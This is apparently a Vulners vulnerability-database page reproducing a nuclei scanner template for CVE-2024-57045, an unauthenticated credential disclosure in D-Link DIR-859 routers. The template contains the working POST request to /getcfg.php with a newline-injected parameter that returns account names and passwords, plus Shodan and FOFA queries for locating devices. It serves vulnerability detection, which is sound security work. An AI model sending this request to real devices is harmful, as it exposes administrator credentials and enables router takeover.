Lucene search
K

D-Link DIR-859 - Information Disclosure

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

Critical information disclosure in D-Link DIR-859 exposes sensitive credentials via unauthenticated requests.

Related
Refs
Code
id: CVE-2024-57045

info:
  name: D-Link DIR-859 - Information Disclosure
  author: ritikchaddha
  severity: critical
  description: |
    A critical information disclosure vulnerability exists in D-Link devices where sensitive device account information including credentials can be retrieved by sending an unauthenticated request to `/getcfg.php` endpoint with the parameter `SERVICES=DEVICE.ACCOUNT`. This could allow attackers to obtain administrative credentials and gain full control of the affected device.
  impact: |
    Unauthenticated attackers can retrieve administrative credentials and sensitive device account information, enabling full device compromise.
  remediation: |
    Update D-Link DIR-859 router to the latest firmware version that addresses CVE-2024-57045 as specified in D-Link's security bulletin.
  reference:
    - https://www.dlink.com/en/security-bulletin
    - https://nvd.nist.gov/vuln/detail/CVE-2024-57045
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-57045
    cwe-id: CWE-200
    epss-score: 0.32261
    epss-percentile: 0.98116
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"D-Link"
    fofa-query: title="D-Link"
    vendor: D-Link
  tags: cve,cve2024,dlink,disclosure,unauth,vuln


http:
  - raw:
      - |
        POST /getcfg.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<name>"
          - "<password>"
          - "<account>"
        condition: and

      - type: word
        part: content_type
        words:
          - "text/xml"

      - type: status
        status:
          - 200
# digest: 490a004630440220575d6fc66d9d77cb87fa9a1a10f873267a14b912d0d1fbec87fb40e5c56750a40220785dfef5f219f2ea9afe9f356ab9c75246a9a8e694a83d593c107c5330452be1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.19.8
EPSS0.32261
SSVC
28